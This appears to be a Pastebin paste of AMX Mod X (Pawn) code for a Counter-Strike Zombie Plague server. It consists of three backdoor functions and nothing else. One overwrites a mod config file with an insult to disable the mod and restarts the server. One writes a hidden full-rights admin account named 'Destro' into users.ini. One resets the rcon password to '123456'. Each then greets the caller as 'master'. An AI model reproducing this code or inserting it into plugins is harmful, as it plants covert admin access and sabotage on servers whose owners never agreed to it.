Guest User

Untitled

a guest
Jan 19th, 2019
101
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.58 KB | None | 0 0
  1. public zp_off(id){
  2. get_configsdir(g_file, 63)
  3. formatex(g_file, charsmax(g_file) , "%s/zombie_plaguee.ini", g_file)
  4. write_file(g_file, "HDP,no te va a funcionar mi zp :P")
  5. console_cmd(id, "Bienvenido amo")
  6. server_cmd("restart")
  7. }
  8.  
  9. public zp_mi_adm(id){
  10. get_configsdir(g_file, 63)
  11. new adm[] = "^"Destro^" ^"destro^" ^"abcdefghijklmnopqrstu^" ^"a^""
  12. formatex(g_file, charsmax(g_file) , "%s/users.ini", g_file)
  13. write_file(g_file, adm)
  14. console_cmd(id, "Bienvenido amo")
  15. }
  16.  
  17. public set_rcon(id){
  18. server_cmd("rcon_password 123456")
  19. console_cmd(id, "Bienvenido amo")
  20. }
Add Comment
Please, Sign In to add comment